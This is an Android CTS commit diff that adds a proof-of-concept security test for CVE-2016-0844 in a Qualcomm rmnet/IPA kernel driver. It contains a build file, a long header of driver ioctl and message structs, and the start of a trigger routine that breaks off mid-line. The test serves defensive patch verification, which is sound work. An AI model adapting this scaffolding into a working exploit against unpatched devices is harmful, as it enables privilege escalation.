diff options
author | manish <manish.pandey2@harman.corp-partner.google.com> | 2018-03-20 12:42:52 +0530 |
---|---|---|
committer | Pradeep Chenthati <pchenthati@google.com> | 2018-06-08 18:07:26 +0000 |
commit | e2fd58d679ecfc7254633d1e3813a0e38a37bad1 (patch) | |
tree | 6dbcebeb7d87b9abf21be228d32c020241a6caed | |
parent | 90c9516a195fe68bf9070a68ac6e4be06bc5f4c3 (diff) | |
download | cts-e2fd58d679ecfc7254633d1e3813a0e38a37bad1.tar.gz |
[RESTRICT AUTOMERGE]: CTS test for Android Security b/72509609 b/26324307
Test: successful run of newly introduced CTS test case.
Bug: 72509609
Bug: 26324307
Change-Id: I02fff0d3522b291b74c5a1a6c7ca6c7dfd8368a2
Signed-off-by: manish <manish.pandey2@harman.corp-partner.google.com>
(cherry picked from commit cac61d428a1c1cd42fd994f4acdb9a7d5414aead)
5 files changed, 741 insertions, 0 deletions
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml index 28699b99257..6fdd84042a7 100755 --- a/hostsidetests/security/AndroidTest.xml +++ b/hostsidetests/security/AndroidTest.xml @@ -44,6 +44,7 @@ <!--__________________--> <!-- Bulletin 2016-04 --> <!-- Please add tests solely from this bulletin below to avoid merge conflict --> + <option name="push" value="CVE-2016-0844->/data/local/tmp/CVE-2016-0844" /> <option name="push" value="CVE-2016-2419->/data/local/tmp/CVE-2016-2419" /> <!-- Bulletin 2016-05 --> diff --git a/hostsidetests/security/securityPatch/CVE-2016-0844/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-0844/Android.mk new file mode 100644 index 00000000000..19585cc7132 --- /dev/null +++ b/hostsidetests/security/securityPatch/CVE-2016-0844/Android.mk @@ -0,0 +1,33 @@ +# Copyright (C) 2018 The Android Open Source Project +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +LOCAL_PATH := $(call my-dir) + +include $(CLEAR_VARS) +LOCAL_MODULE := CVE-2016-0844 +LOCAL_SRC_FILES := poc.c +LOCAL_MULTILIB := both +LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32 +LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64 + +# Tag this module as a cts test artifact +LOCAL_COMPATIBILITY_SUITE := cts sts +LOCAL_CTS_TEST_PACKAGE := android.security.cts + +LOCAL_ARM_MODE := arm +LOCAL_CFLAGS += -Wall -Werror +LOCAL_CFLAGS += -Iinclude -fPIE +LOCAL_LDFLAGS += -fPIE -pie +LOCAL_LDFLAGS += -rdynamic +include $(BUILD_CTS_EXECUTABLE) diff --git a/hostsidetests/security/securityPatch/CVE-2016-0844/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-0844/local_poc.h new file mode 100644 index 00000000000..960c9df9d87 --- /dev/null +++ b/hostsidetests/security/securityPatch/CVE-2016-0844/local_poc.h @@ -0,0 +1,620 @@ +/** + * Copyright (C) 2018 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions vand + * limitations under the License. + */ +#include <sys/types.h> +#ifndef IPA_QMI_SERVICE_V01_H +#define IPA_QMI_SERVICE_V01_H + +#define QMI_IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS_V01 2 +#define QMI_IPA_IPFLTR_NUM_MEQ_32_EQNS_V01 2 +#define QMI_IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS_V01 2 +#define QMI_IPA_IPFLTR_NUM_MEQ_128_EQNS_V01 2 +#define QMI_IPA_MAX_FILTERS_V01 64 + +#define IPA_INT_MAX ((int)(~0U >> 1)) +#define IPA_INT_MIN (-IPA_INT_MAX - 1) + +enum ipa_qmi_result_type_v01 { + IPA_QMI_RESULT_TYPE_MIN_ENUM_VAL_V01 = IPA_INT_MIN, + IPA_QMI_RESULT_SUCCESS_V01 = 0, + IPA_QMI_RESULT_FAILURE_V01 = 1, + IPA_QMI_RESULT_TYPE_MAX_ENUM_VAL_V01 = IPA_INT_MAX, +}; + +enum ipa_qmi_error_type_v01 { + IPA_QMI_ERROR_TYPE_MIN_ENUM_VAL_V01 = IPA_INT_MIN, + IPA_QMI_ERR_NONE_V01 = 0x0000, + IPA_QMI_ERR_MALFORMED_MSG_V01 = 0x0001, + IPA_QMI_ERR_NO_MEMORY_V01 = 0x0002, + IPA_QMI_ERR_INTERNAL_V01 = 0x0003, + IPA_QMI_ERR_CLIENT_IDS_EXHAUSTED_V01 = 0x0005, + IPA_QMI_ERR_INVALID_ID_V01 = 0x0029, + IPA_QMI_ERR_ENCODING_V01 = 0x003A, + IPA_QMI_ERR_INCOMPATIBLE_STATE_V01 = 0x005A, + IPA_QMI_ERR_NOT_SUPPORTED_V01 = 0x005E, + IPA_QMI_ERROR_TYPE_MAX_ENUM_VAL_V01 = IPA_INT_MAX, +}; + +struct ipa_qmi_response_type_v01 { + enum ipa_qmi_result_type_v01 result; + enum ipa_qmi_error_type_v01 error; +}; + +enum ipa_platform_type_enum_v01 { + IPA_PLATFORM_TYPE_ENUM_MIN_ENUM_VAL_V01 = -2147483647, + QMI_IPA_PLATFORM_TYPE_INVALID_V01 = 0, + QMI_IPA_PLATFORM_TYPE_TN_V01 = 1, + QMI_IPA_PLATFORM_TYPE_LE_V01 = 2, + QMI_IPA_PLATFORM_TYPE_MSM_ANDROID_V01 = 3, + QMI_IPA_PLATFORM_TYPE_MSM_WINDOWS_V01 = 4, + QMI_IPA_PLATFORM_TYPE_MSM_QNX_V01 = 5, + IPA_PLATFORM_TYPE_ENUM_MAX_ENUM_VAL_V01 = 2147483647 +}; + +struct ipa_hdr_tbl_info_type_v01 { + uint32_t modem_offset_start; + uint32_t modem_offset_end; +}; + +struct ipa_route_tbl_info_type_v01 { + uint32_t route_tbl_start_addr; + uint32_t num_indices; +}; + +struct ipa_modem_mem_info_type_v01 { + uint32_t block_start_addr; + uint32_t size; +}; + +struct ipa_hdr_proc_ctx_tbl_info_type_v01 { + uint32_t modem_offset_start; + uint32_t modem_offset_end; +}; + +struct ipa_zip_tbl_info_type_v01 { + uint32_t modem_offset_start; + uint32_t modem_offset_end; +}; + +struct ipa_init_modem_driver_req_msg_v01 { + uint8_t platform_type_valid; + enum ipa_platform_type_enum_v01 platform_type; + uint8_t hdr_tbl_info_valid; + struct ipa_hdr_tbl_info_type_v01 hdr_tbl_info; + uint8_t v4_route_tbl_info_valid; + struct ipa_route_tbl_info_type_v01 v4_route_tbl_info; + uint8_t v6_route_tbl_info_valid; + struct ipa_route_tbl_info_type_v01 v6_route_tbl_info; + uint8_t v4_filter_tbl_start_addr_valid; + uint32_t v4_filter_tbl_start_addr; + uint8_t v6_filter_tbl_start_addr_valid; + uint32_t v6_filter_tbl_start_addr; + uint8_t modem_mem_info_valid; + struct ipa_modem_mem_info_type_v01 modem_mem_info; + uint8_t ctrl_comm_dest_end_pt_valid; + uint32_t ctrl_comm_dest_end_pt; + uint8_t is_ssr_bootup_valid; + uint8_t is_ssr_bootup; + uint8_t hdr_proc_ctx_tbl_info_valid; + struct ipa_hdr_proc_ctx_tbl_info_type_v01 hdr_proc_ctx_tbl_info; + uint8_t zip_tbl_info_valid; + struct ipa_zip_tbl_info_type_v01 zip_tbl_info; +}; + +struct ipa_init_modem_driver_resp_msg_v01 { + struct ipa_qmi_response_type_v01 resp; + uint8_t ctrl_comm_dest_end_pt_valid; + uint32_t ctrl_comm_dest_end_pt; + uint8_t default_end_pt_valid; + uint32_t default_end_pt; +}; + +struct ipa_indication_reg_req_msg_v01 { + uint8_t master_driver_init_complete_valid; + uint8_t master_driver_init_complete; +}; + +struct ipa_indication_reg_resp_msg_v01 { + struct ipa_qmi_response_type_v01 resp; +}; + +struct ipa_master_driver_init_complt_ind_msg_v01 { + struct ipa_qmi_response_type_v01 master_driver_init_status; +}; + +struct ipa_ipfltr_range_eq_16_type_v01 { + uint8_t offset; + uint16_t range_low; + uint16_t range_high; +}; + +struct ipa_ipfltr_mask_eq_32_type_v01 { + uint8_t offset; + uint32_t mask; + uint32_t value; +}; + +struct ipa_ipfltr_eq_16_type_v01 { + uint8_t offset; + uint16_t value; +}; + +struct ipa_ipfltr_eq_32_type_v01 { + uint8_t offset; + uint32_t value; +}; + +struct ipa_ipfltr_mask_eq_128_type_v01 { + uint8_t offset; + uint8_t mask[16]; + uint8_t value[16]; +}; + +struct ipa_filter_rule_type_v01 { + uint16_t rule_eq_bitmap; + uint8_t tos_eq_present; + uint8_t tos_eq; + uint8_t protocol_eq_present; + uint8_t protocol_eq; + uint8_t num_ihl_offset_range_16; + + struct ipa_ipfltr_range_eq_16_type_v01 + ihl_offset_range_16[QMI_IPA_IPFLTR_NUM_IHL_RANGE_16_EQNS_V01]; + + uint8_t num_offset_meq_32; + + struct ipa_ipfltr_mask_eq_32_type_v01 + offset_meq_32[QMI_IPA_IPFLTR_NUM_MEQ_32_EQNS_V01]; + + uint8_t tc_eq_present; + uint8_t tc_eq; + uint8_t flow_eq_present; + uint32_t flow_eq; + uint8_t ihl_offset_eq_16_present; + struct ipa_ipfltr_eq_16_type_v01 ihl_offset_eq_16; + uint8_t ihl_offset_eq_32_present; + struct ipa_ipfltr_eq_32_type_v01 ihl_offset_eq_32; + uint8_t num_ihl_offset_meq_32; + struct ipa_ipfltr_mask_eq_32_type_v01 + ihl_offset_meq_32[QMI_IPA_IPFLTR_NUM_IHL_MEQ_32_EQNS_V01]; + uint8_t num_offset_meq_128; + struct ipa_ipfltr_mask_eq_128_type_v01 + offset_meq_128[QMI_IPA_IPFLTR_NUM_MEQ_128_EQNS_V01]; + + uint8_t metadata_meq32_present; + + struct ipa_ipfltr_mask_eq_32_type_v01 metadata_meq32; + uint8_t ipv4_frag_eq_present; +}; + +enum ipa_ip_type_enum_v01 { + IPA_IP_TYPE_ENUM_MIN_ENUM_VAL_V01 = -2147483647, + QMI_IPA_IP_TYPE_INVALID_V01 = 0, + QMI_IPA_IP_TYPE_V4_V01 = 1, + QMI_IPA_IP_TYPE_V6_V01 = 2, + QMI_IPA_IP_TYPE_V4V6_V01 = 3, + IPA_IP_TYPE_ENUM_MAX_ENUM_VAL_V01 = 2147483647 +}; + +enum ipa_filter_action_enum_v01 { + IPA_FILTER_ACTION_ENUM_MIN_ENUM_VAL_V01 = -2147483647, + QMI_IPA_FILTER_ACTION_INVALID_V01 = 0, + QMI_IPA_FILTER_ACTION_SRC_NAT_V01 = 1, + QMI_IPA_FILTER_ACTION_DST_NAT_V01 = 2, + QMI_IPA_FILTER_ACTION_ROUTING_V01 = 3, + QMI_IPA_FILTER_ACTION_EXCEPTION_V01 = 4, + IPA_FILTER_ACTION_ENUM_MAX_ENUM_VAL_V01 = 2147483647 +}; + +struct ipa_filter_spec_type_v01 { + uint32_t filter_spec_identifier; + enum ipa_ip_type_enum_v01 ip_type; + struct ipa_filter_rule_type_v01 filter_rule; + enum ipa_filter_action_enum_v01 filter_action; + uint8_t is_routing_table_index_valid; + uint32_t route_table_index; + uint8_t is_mux_id_valid; + uint32_t mux_id; +}; + +struct ipa_install_fltr_rule_req_msg_v01 { + uint8_t filter_spec_list_valid; + uint32_t filter_spec_list_len; + struct ipa_filter_spec_type_v01 filter_spec_list[QMI_IPA_MAX_FILTERS_V01]; + uint8_t source_pipe_index_valid; + uint32_t source_pipe_index; + uint8_t num_ipv4_filters_valid; + uint32_t num_ipv4_filters; + uint8_t num_ipv6_filters_valid; + uint32_t num_ipv6_filters; + uint8_t xlat_filter_indices_list_valid; + uint32_t xlat_filter_indices_list_len; + uint32_t xlat_filter_indices_list[QMI_IPA_MAX_FILTERS_V01]; +}; + +struct ipa_filter_rule_identifier_to_handle_map_v01 { + uint32_t filter_spec_identifier; + uint32_t filter_handle; +}; + +struct ipa_install_fltr_rule_resp_msg_v01 { + struct ipa_qmi_response_type_v01 resp; + uint8_t filter_handle_list_valid; + uint32_t filter_handle_list_len; + struct ipa_filter_rule_identifier_to_handle_map_v01 + filter_handle_list[QMI_IPA_MAX_FILTERS_V01]; +}; + +struct ipa_filter_handle_to_index_map_v01 { + uint32_t filter_handle; + uint32_t filter_index; +}; + +struct ipa_fltr_installed_notif_req_msg_v01 { + uint32_t source_pipe_index; + enum ipa_qmi_result_type_v01 install_status; + uint32_t filter_index_list_len; + struct ipa_filter_handle_to_index_map_v01 + filter_index_list[QMI_IPA_MAX_FILTERS_V01]; + + uint8_t embedded_pipe_index_valid; + uint32_t embedded_pipe_index; + uint8_t retain_header_valid; + uint8_t retain_header; + uint8_t embedded_call_mux_id_valid; + uint32_t embedded_call_mux_id; + uint8_t num_ipv4_filters_valid; + uint32_t num_ipv4_filters; + uint8_t num_ipv6_filters_valid; + uint32_t num_ipv6_filters; + uint8_t start_ipv4_filter_idx_valid; + uint32_t start_ipv4_filter_idx; + uint8_t start_ipv6_filter_idx_valid; + uint32_t start_ipv6_filter_idx; +}; + +struct ipa_fltr_installed_notif_resp_msg_v01 { + struct ipa_qmi_response_type_v01 resp; +}; + +struct ipa_enable_force_clear_datapath_req_msg_v01 { + uint32_t source_pipe_bitmask; + uint32_t request_id; + uint8_t throttle_source_valid; + uint8_t throttle_source; +}; + +struct ipa_enable_force_clear_datapath_resp_msg_v01 { + struct ipa_qmi_response_type_v01 resp; +}; + +struct ipa_disable_force_clear_datapath_req_msg_v01 { + uint32_t request_id; +}; + +struct ipa_disable_force_clear_datapath_resp_msg_v01 { + struct ipa_qmi_response_type_v01 resp; +}; + +enum ipa_peripheral_speed_enum_v01 { + IPA_PERIPHERAL_SPEED_ENUM_MIN_ENUM_VAL_V01 = -2147483647, + QMI_IPA_PER_USB_FS_V01 = 1, + QMI_IPA_PER_USB_HS_V01 = 2, + QMI_IPA_PER_USB_SS_V01 = 3, + IPA_PERIPHERAL_SPEED_ENUM_MAX_ENUM_VAL_V01 = 2147483647 +}; + +enum ipa_pipe_mode_enum_v01 { + IPA_PIPE_MODE_ENUM_MIN_ENUM_VAL_V01 = -2147483647, + QMI_IPA_PIPE_MODE_HW_V01 = 1, + QMI_IPA_PIPE_MODE_SW_V01 = 2, + IPA_PIPE_MODE_ENUM_MAX_ENUM_VAL_V01 = 2147483647 +}; + +enum ipa_peripheral_type_enum_v01 { + IPA_PERIPHERAL_TYPE_ENUM_MIN_ENUM_VAL_V01 = -2147483647, + QMI_IPA_PERIPHERAL_USB_V01 = 1, + QMI_IPA_PERIPHERAL_HSIC_V01 = 2, + QMI_IPA_PERIPHERAL_PCIE_V01 = 3, + IPA_PERIPHERAL_TYPE_ENUM_MAX_ENUM_VAL_V01 = 2147483647 +}; + +struct ipa_config_req_msg_v01 { + uint8_t peripheral_type_valid; + enum ipa_peripheral_type_enum_v01 peripheral_type; + uint8_t hw_deaggr_supported_valid; + uint8_t hw_deaggr_supported; + uint8_t max_aggr_frame_size_valid; + uint32_t max_aggr_frame_size; + uint8_t ipa_ingress_pipe_mode_valid; + enum ipa_pipe_mode_enum_v01 ipa_ingress_pipe_mode; + uint8_t peripheral_speed_info_valid; + enum ipa_peripheral_speed_enum_v01 peripheral_speed_info; + uint8_t dl_accumulation_time_limit_valid; + uint32_t dl_accumulation_time_limit; + uint8_t dl_accumulation_pkt_limit_valid; + uint32_t dl_accumulation_pkt_limit; + uint8_t dl_accumulation_byte_limit_valid; + uint32_t dl_accumulation_byte_limit; + uint8_t ul_accumulation_time_limit_valid; + uint32_t ul_accumulation_time_limit; + uint8_t hw_control_flags_valid; + uint32_t hw_control_flags; + uint8_t ul_msi_event_threshold_valid; + uint32_t ul_msi_event_threshold; + uint8_t dl_msi_event_threshold_valid; + uint32_t dl_msi_event_threshold; +}; + +struct ipa_config_resp_msg_v01 { + struct ipa_qmi_response_type_v01 resp; +}; + +/*Service Message Definition*/ +#define QMI_IPA_INDICATION_REGISTER_REQ_V01 0x0020 +#define QMI_IPA_INDICATION_REGISTER_RESP_V01 0x0020 +#define QMI_IPA_INIT_MODEM_DRIVER_REQ_V01 0x0021 +#define QMI_IPA_INIT_MODEM_DRIVER_RESP_V01 0x0021 +#define QMI_IPA_MASTER_DRIVER_INIT_COMPLETE_IND_V01 0x0022 +#define QMI_IPA_INSTALL_FILTER_RULE_REQ_V01 0x0023 +#define QMI_IPA_INSTALL_FILTER_RULE_RESP_V01 0x0023 +#define QMI_IPA_FILTER_INSTALLED_NOTIF_REQ_V01 0x0024 +#define QMI_IPA_FILTER_INSTALLED_NOTIF_RESP_V01 0x0024 +#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_REQ_V01 0x0025 +#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_RESP_V01 0x0025 +#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_REQ_V01 0x0026 +#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_RESP_V01 0x0026 +#define QMI_IPA_CONFIG_REQ_V01 0x0027 +#define QMI_IPA_CONFIG_RESP_V01 0x0027 + +/* add for max length*/ +#define QMI_IPA_INIT_MODEM_DRIVER_REQ_MAX_MSG_LEN_V01 98 +#define QMI_IPA_INIT_MODEM_DRIVER_RESP_MAX_MSG_LEN_V01 21 +#define QMI_IPA_INDICATION_REGISTER_REQ_MAX_MSG_LEN_V01 4 +#define QMI_IPA_INDICATION_REGISTER_RESP_MAX_MSG_LEN_V01 7 +#define QMI_IPA_INSTALL_FILTER_RULE_REQ_MAX_MSG_LEN_V01 11293 +#define QMI_IPA_INSTALL_FILTER_RULE_RESP_MAX_MSG_LEN_V01 523 +#define QMI_IPA_FILTER_INSTALLED_NOTIF_REQ_MAX_MSG_LEN_V01 574 +#define QMI_IPA_FILTER_INSTALLED_NOTIF_RESP_MAX_MSG_LEN_V01 7 +#define QMI_IPA_MASTER_DRIVER_INIT_COMPLETE_IND_MAX_MSG_LEN_V01 7 + +#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_REQ_MAX_MSG_LEN_V01 18 +#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_REQ_MAX_MSG_LEN_V01 7 +#define QMI_IPA_ENABLE_FORCE_CLEAR_DATAPATH_RESP_MAX_MSG_LEN_V01 7 +#define QMI_IPA_DISABLE_FORCE_CLEAR_DATAPATH_RESP_MAX_MSG_LEN_V01 7 + +#define QMI_IPA_CONFIG_REQ_MAX_MSG_LEN_V01 81 +#define QMI_IPA_CONFIG_RESP_MAX_MSG_LEN_V01 7 +/* Service Object Accessor */ + +#endif /* IPA_QMI_SERVICE_V01_H */ + +#ifndef _UAPI_MSM_IPC_H_ +#define _UAPI_MSM_IPC_H_ + +#include <linux/ioctl.h> +#include <linux/types.h> + +struct msm_ipc_port_addr { + uint32_t node_id; + uint32_t port_id; +}; + +struct msm_ipc_port_name { + uint32_t service; + uint32_t instance; +}; + +struct msm_ipc_addr { + unsigned char addrtype; + union { + struct msm_ipc_port_addr port_addr; + struct msm_ipc_port_name port_name; + } addr; +}; + +#define MSM_IPC_WAIT_FOREVER (~0) /* timeout for permanent subscription */ + +#ifndef AF_MSM_IPC +#define AF_MSM_IPC 27 +#endif + +#ifndef PF_MSM_IPC +#define PF_MSM_IPC AF_MSM_IPC +#endif + +#define MSM_IPC_ADDR_NAME 1 +#define MSM_IPC_ADDR_ID 2 + +struct sockaddr_msm_ipc { + unsigned short family; + struct msm_ipc_addr address; + unsigned char reserved; +}; + +struct config_sec_rules_args { + int num_group_info; + uint32_t service_id; + uint32_t instance_id; + unsigned reserved; + gid_t group_id[0]; +}; + +#define IPC_ROUTER_IOCTL_MAGIC (0xC3) + +#define IPC_ROUTER_IOCTL_GET_VERSION \ + _IOR(IPC_ROUTER_IOCTL_MAGIC, 0, unsigned int) + +#define IPC_ROUTER_IOCTL_GET_MTU _IOR(IPC_ROUTER_IOCTL_MAGIC, 1, unsigned int) + +#define IPC_ROUTER_IOCTL_LOOKUP_SERVER \ + _IOWR(IPC_ROUTER_IOCTL_MAGIC, 2, struct sockaddr_msm_ipc) + +#define IPC_ROUTER_IOCTL_GET_CURR_PKT_SIZE \ + _IOR(IPC_ROUTER_IOCTL_MAGIC, 3, unsigned int) + +#define IPC_ROUTER_IOCTL_BIND_CONTROL_PORT \ + _IOR(IPC_ROUTER_IOCTL_MAGIC, 4, unsigned int) + +#define IPC_ROUTER_IOCTL_CONFIG_SEC_RULES \ + _IOR(IPC_ROUTER_IOCTL_MAGIC, 5, struct config_sec_rules_args) + +struct msm_ipc_server_info { + uint32_t node_id; + uint32_t port_id; + uint32_t service; + uint32_t instance; +}; + +struct server_lookup_args { + struct msm_ipc_port_name port_name; + int num_entries_in_array; + int num_entries_found; + uint32_t lookup_mask; + struct msm_ipc_server_info srv_info[0]; +}; + +#endif + +#ifndef _UAPI_MSM_RMNET_H_ +#define _UAPI_MSM_RMNET_H_ + +/* Bitmap macros for RmNET driver operation mode. */ +#define RMNET_MODE_NONE (0x00) +#define RMNET_MODE_LLP_ETH (0x01) +#define RMNET_MODE_LLP_IP (0x02) +#define RMNET_MODE_QOS (0x04) +#define RMNET_MODE_MASK \ + (RMNET_MODE_LLP_ETH | RMNET_MODE_LLP_IP | RMNET_MODE_QOS) + +#define RMNET_IS_MODE_QOS(mode) ((mode & RMNET_MODE_QOS) == RMNET_MODE_QOS) +#define RMNET_IS_MODE_IP(mode) ((mode & RMNET_MODE_LLP_IP) == RMNET_MODE_LLP_IP) + +enum rmnet_ioctl_cmds_e { + RMNET_IOCTL_SET_LLP_ETHERNET = 0x000089F1, /* Set Ethernet protocol */ + RMNET_IOCTL_SET_LLP_IP = 0x000089F2, /* Set RAWIP protocol */ + RMNET_IOCTL_GET_LLP = 0x000089F3, /* Get link protocol */ + RMNET_IOCTL_SET_QOS_ENABLE = 0x000089F4, /* Set QoS header enabled */ + RMNET_IOCTL_SET_QOS_DISABLE = 0x000089F5, /* Set QoS header disabled*/ + RMNET_IOCTL_GET_QOS = 0x000089F6, /* Get QoS header state */ + RMNET_IOCTL_GET_OPMODE = 0x000089F7, /* Get operation mode */ + RMNET_IOCTL_OPEN = 0x000089F8, /* Open transport port */ + RMNET_IOCTL_CLOSE = 0x000089F9, /* Close transport port */ + RMNET_IOCTL_FLOW_ENABLE = 0x000089FA, /* Flow enable */ + RMNET_IOCTL_FLOW_DISABLE = 0x000089FB, /* Flow disable */ + RMNET_IOCTL_FLOW_SET_HNDL = 0x000089FC, /* Set flow handle */ + RMNET_IOCTL_EXTENDED = 0x000089FD, /* Extended IOCTLs */ + RMNET_IOCTL_MAX +}; + +enum rmnet_ioctl_extended_cmds_e { + /* RmNet Data Required IOCTLs */ + RMNET_IOCTL_GET_SUPPORTED_FEATURES = 0x0000, /* Get features */ + RMNET_IOCTL_SET_MRU = 0x0001, /* Set MRU */ + RMNET_IOCTL_GET_MRU = 0x0002, /* Get MRU */ + RMNET_IOCTL_GET_EPID = 0x0003, /* Get endpoint ID */ + RMNET_IOCTL_GET_DRIVER_NAME = 0x0004, /* Get driver name */ + RMNET_IOCTL_ADD_MUX_CHANNEL = 0x0005, /* Add MUX ID */ + RMNET_IOCTL_SET_EGRESS_DATA_FORMAT = 0x0006, /* Set EDF */ + RMNET_IOCTL_SET_INGRESS_DATA_FORMAT = 0x0007, /* Set IDF */ + RMNET_IOCTL_SET_AGGREGATION_COUNT = 0x0008, /* Set agg count */ + RMNET_IOCTL_GET_AGGREGATION_COUNT = 0x0009, /* Get agg count */ + RMNET_IOCTL_SET_AGGREGATION_SIZE = 0x000A, /* Set agg size */ + RMNET_IOCTL_GET_AGGREGATION_SIZE = 0x000B, /* Get agg size */ + RMNET_IOCTL_FLOW_CONTROL = 0x000C, /* Do flow control */ + RMNET_IOCTL_GET_DFLT_CONTROL_CHANNEL = 0x000D, /* For legacy use */ + RMNET_IOCTL_GET_HWSW_MAP = 0x000E, /* Get HW/SW map */ + RMNET_IOCTL_SET_RX_HEADROOM = 0x000F, /* RX Headroom */ + RMNET_IOCTL_GET_EP_PAIR = 0x0010, /* Endpoint pair */ + RMNET_IOCTL_SET_QOS_VERSION = 0x0011, /* 8/6 byte QoS hdr*/ + RMNET_IOCTL_GET_QOS_VERSION = 0x0012, /* 8/6 byte QoS hdr*/ + RMNET_IOCTL_GET_SUPPORTED_QOS_MODES = 0x0013, /* Get QoS modes */ + RMNET_IOCTL_SET_SLEEP_STATE = 0x0014, /* Set sleep state */ + RMNET_IOCTL_SET_XLAT_DEV_INFO = 0x0015, /* xlat dev name */ + RMNET_IOCTL_EXTENDED_MAX = 0x0016 +}; + +/* Return values for the RMNET_IOCTL_GET_SUPPORTED_FEATURES IOCTL */ +#define RMNET_IOCTL_FEAT_NOTIFY_MUX_CHANNEL (1 << 0) +#define RMNET_IOCTL_FEAT_SET_EGRESS_DATA_FORMAT (1 << 1) +#define RMNET_IOCTL_FEAT_SET_INGRESS_DATA_FORMAT (1 << 2) +#define RMNET_IOCTL_FEAT_SET_AGGREGATION_COUNT (1 << 3) +#define RMNET_IOCTL_FEAT_GET_AGGREGATION_COUNT (1 << 4) +#define RMNET_IOCTL_FEAT_SET_AGGREGATION_SIZE (1 << 5) +#define RMNET_IOCTL_FEAT_GET_AGGREGATION_SIZE (1 << 6) +#define RMNET_IOCTL_FEAT_FLOW_CONTROL (1 << 7) +#define RMNET_IOCTL_FEAT_GET_DFLT_CONTROL_CHANNEL (1 << 8) +#define RMNET_IOCTL_FEAT_GET_HWSW_MAP (1 << 9) + +/* Input values for the RMNET_IOCTL_SET_EGRESS_DATA_FORMAT IOCTL */ +#define RMNET_IOCTL_EGRESS_FORMAT_MAP (1 << 1) +#define RMNET_IOCTL_EGRESS_FORMAT_AGGREGATION (1 << 2) +#define RMNET_IOCTL_EGRESS_FORMAT_MUXING (1 << 3) +#define RMNET_IOCTL_EGRESS_FORMAT_CHECKSUM (1 << 4) + +/* Input values for the RMNET_IOCTL_SET_INGRESS_DATA_FORMAT IOCTL */ +#define RMNET_IOCTL_INGRESS_FORMAT_MAP (1 << 1) +#define RMNET_IOCTL_INGRESS_FORMAT_DEAGGREGATION (1 << 2) +#define RMNET_IOCTL_INGRESS_FORMAT_DEMUXING (1 << 3) +#define RMNET_IOCTL_INGRESS_FORMAT_CHECKSUM (1 << 4) + +/* User space may not have this defined. */ +#ifndef IFNAMSIZ +#define IFNAMSIZ 16 +#endif + +struct rmnet_ioctl_extended_s { + uint32_t extended_ioctl; + union { + uint32_t data; /* Generic data field for most extended IOCTLs */ + int8_t if_name[IFNAMSIZ]; + struct { + uint32_t mux_id; + int8_t vchannel_name[IFNAMSIZ]; + } rmnet_mux_val; + struct { + uint8_t flow_mode; + uint8_t mux_id; + } flow_control_prop; + struct { + uint32_t consumer_pipe_num; + uint32_t producer_pipe_num; + } ipa_ep_pair; + } u; +}; + +struct rmnet_ioctl_data_s { + union { + uint32_t operation_mode; + uint32_t tcm_handle; + } u; +}; + +#define RMNET_IOCTL_QOS_MODE_6 (1 << 0) +#define RMNET_IOCTL_QOS_MODE_8 (1 << 1) + +#define QMI_QOS_HDR_S __attribute((__packed__)) qmi_qos_hdr_s +struct QMI_QOS_HDR_S { + unsigned char version; + unsigned char flags; + uint32_t flow_id; +}; + +struct qmi_qos_hdr8_s { + struct QMI_QOS_HDR_S hdr; + uint8_t reserved[2]; +} __attribute((__packed__)); + +#endif diff --git a/hostsidetests/security/securityPatch/CVE-2016-0844/poc.c b/hostsidetests/security/securityPatch/CVE-2016-0844/poc.c new file mode 100644 index 00000000000..12427684710 --- /dev/null +++ b/hostsidetests/security/securityPatch/CVE-2016-0844/poc.c @@ -0,0 +1,79 @@ +/** + * Copyright (C) 2018 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions vand + * limitations under the License. + */ +#define _GNU_SOURCE +#include <errno.h> +#include <fcntl.h> +#include <net/if.h> +#include <net/if_arp.h> +#include <netdb.h> +#include <netinet/in.h> +#include <stdio.h> +#include <stdlib.h> +#include <string.h> +#include <sys/ioctl.h> +#include <sys/prctl.h> +#include <sys/socket.h> +#include <sys/types.h> +#include <time.h> +#include <unistd.h> +#include "local_poc.h" + +#define WAN_IOC_MAGIC 0x69 +#define WAN_IOCTL_ADD_FLT_RULE 0 +#define WAN_IOCTL_ADD_FLT_INDEX 2 +#define WAN_IOC_ADD_FLT_RULE \ + _IOWR(WAN_IOC_MAGIC, WAN_IOCTL_ADD_FLT_RULE, \ + struct ipa_install_fltr_rule_req_msg_v01 *) + +#define WAN_IOC_ADD_FLT_RULE_INDEX \ + _IOWR(WAN_IOC_MAGIC, WAN_IOCTL_ADD_FLT_INDEX, \ + struct ipa_fltr_installed_notif_req_msg_v01 *) + +int trigger(int sfd, char *ifname) { + int ret; + struct ifreq ifr; + unsigned cmd = RMNET_IOCTL_EXTENDED; + strlcpy(ifr.ifr_name, ifname, IFNAMSIZ); + struct rmnet_ioctl_extended_s extendata; + int i; + ifr.ifr_ifru.ifru_data = 